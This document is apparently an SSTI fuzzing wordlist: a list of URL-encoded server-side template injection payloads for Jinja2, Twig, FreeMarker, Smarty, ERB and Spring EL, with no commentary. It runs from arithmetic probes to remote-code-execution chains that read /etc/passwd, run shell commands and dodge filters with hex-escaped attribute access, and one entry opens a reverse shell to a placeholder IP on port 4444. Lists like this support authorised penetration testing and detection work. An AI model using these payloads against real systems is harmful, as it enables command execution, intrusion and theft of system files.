%7B%7B2*2%7D%7D
%5B%5B3*3%5D%5D
%7B%7B3*3%7D%7D
%7B%7B3*'3'%7D%7D
%3C%25%3D%203%20*%203%20%25%3E
%24%7B6*6%7D
%24%7B%7B3*3%7D%7D
%40(6%2B5)
%23%7B3*3%7D
%23%7B%203%20*%203%20%7D
%7B%7Bdump(app)%7D%7D
%7B%7Bapp.request.server.all%7Cjoin(',')%7D%7D
%7B%7Bconfig.items()%7D%7D
%7B%7B%20%5B%5D.class.base.subclasses()%20%7D%7D
%7B%7B''.class.mro()%5B1%5D.subclasses()%7D%7D
%7B%7B%20''. __class__. __mro__%5B2%5D. __subclasses__()%20%7D%7D
%7B%7B''. __class__. __base__. __subclasses__()%7D%7D
%7B%7B''. __class__. __base__. __subclasses__()%5B227%5D('cat%20/etc/passwd'%2C%20shell%3DTrue%2C%20stdout%3D-1).communicate()%7D%7D
%7B%25%20for%20key%2C%20value%20in%20config.iteritems()%20%25%7D%3Cdt%3E%7B%7B%20key%7Ce%20%7D%7D%3C%2Fdt%3E%3Cdd%3E%7B%7B%20value%7Ce%20%7D%7D%3C%2Fdd%3E%7B%25%20endfor%20%25%7D
%7B%7B'a'.toUpperCase()%7D%7D
%7B%7B%20request%20%7D%7D
%7B%7Bself%7D%7D
%3C%25%3D%20File.open('/etc/passwd').read%20%25%3E
%3C%23assign%20ex%20%3D%20%22freemarker.template.utility.Execute%22%3Fnew()%3E%24%7B%20ex(%22id%22)%7D
%5B%23assign%20ex%20%3D%20'freemarker.template.utility.Execute'%3Fnew()%5D%24%7B%20ex('id')%7D
%24%7B%22freemarker.template.utility.Execute%22%3Fnew()(%22id%22)%7D
%7B%7Bapp.request.query.filter(0%2C0%2C1024%2C%7B'options'%3A'system'%7D)%7D%7D
%7B%7B%20''. __class__. __mro__%5B2%5D. __subclasses__()%5B40%5D('/etc/passwd').read()%20%7D%7D
%7B%7B%20config.items()%5B4%5D%5B1%5D. __class__. __mro__%5B2%5D. __subclasses__()%5B40%5D(%22/etc/passwd%22).read()%20%7D%7D
%7B%7B''. __class__.mro()%5B1%5D. __subclasses__()%5B396%5D('cat%20/etc/passwd'%2Cshell%3DTrue%2Cstdout%3D-1).communicate()%5B0%5D.strip()%7D%7D
%7B%7Bconfig. __class__. __init__. __globals__['os'].popen('ls').read()%7D%7D
%7B%25%20for%20x%20in%20(). __class__. __base__. __subclasses__()%20%25%7D%7B%25%20if%20%22warning%22%20in%20x. __name__%20%25%7D%7B%7Bx()._module. __builtins__[' __import__']('os').popen(request.args.input).read()%7D%7D%7B%25endif%25%7D%7B%25endfor%25%7D
%7B$smarty.version%7D
%7Bphp%7Decho%20%60id%60%3B%7B/php%7D
%7B%7B%5B'id'%5D%7Cfilter('system')%7D%7D
%7B%7B%5B'cat%5Cx20/etc/passwd'%5D%7Cfilter('system')%7D%7D
%7B%7B%5B'cat$IFS/etc/passwd'%5D%7Cfilter('system')%7D%7D
%7B%7Brequest%7Cattr(%5Brequest.args.usc*2%2Crequest.args.class%2Crequest.args.usc*2%5D%7Cjoin)%7D%7D
%7B%7Brequest%7Cattr(%5B%22_%22*2%2C%22class%22%2C%22_%22*2%5D%7Cjoin)%7D%7D
%7B%7Brequest%7Cattr(%5B%22__%22%2C%22class%22%2C%22__%22%5D%7Cjoin)%7D%7D
%7B%7Brequest%7Cattr(%22__class__%22)%7D%7D
%7B%7Brequest. __class__%7D%7D
%7B%7Brequest%7Cattr('application')%7Cattr('%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f')%7Cattr('%5Cx5f%5Cx5fgetitem%5Cx5f%5Cx5f')('%5Cx5f%5Cx5fbuiltins%5Cx5f%5Cx5f')%7Cattr('%5Cx5f%5Cx5fgetitem%5Cx5f%5Cx5f')('%5Cx5f%5Cx5fimport%5Cx5f%5Cx5f')('os')%7Cattr('popen')('id')%7Cattr('read')()%7D%7D
%7B%7B'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(%22new%20java.lang.String('xxx')%22)%7D%7D
%7B%7B'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(%22var%20x%3Dnew%20java.lang.ProcessBuilder%3B%20x.command(%5C%22whoami%5C%22)%3B%20x.start()%22)%7D%7D
%7B%7B'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(%22var%20x%3Dnew%20java.lang.ProcessBuilder%3B%20x.command(%5C%22netstat%5C%22)%3B%20org.apache.commons.io.IOUtils.toString(x.start().getInputStream())%22)%7D%7D
%7B%7B'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(%22var%20x%3Dnew%20java.lang.ProcessBuilder%3B%20x.command(%5C%22uname%5C%22%2C%5C%22-a%5C%22)%3B%20org.apache.commons.io.IOUtils.toString(x.start().getInputStream())%22)%7D%7D
%7B%25%20for%20x%20in%20(). __class__. __base__. __subclasses__()%20%25%7D%7B%25%20if%20%22warning%22%20in%20x. __name__%20%25%7D%7B%7Bx()._module. __builtins__[' __import__']('os').popen(%22python3%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%5C%22ip%5C%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%5C%22/bin/cat%5C%22%2C%20%5C%22/etc/passwd%5C%22%5D)%3B'%22).read().zfill(417)%7D%7D%7B%25endif%25%7D%7B%25endfor%25%7D
%24%7BT(java.lang.System).getenv()%7D
%24%7BT(java.lang.Runtime).getRuntime().exec('cat%20etc/passwd')%7D
%24%7BT(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())%7D
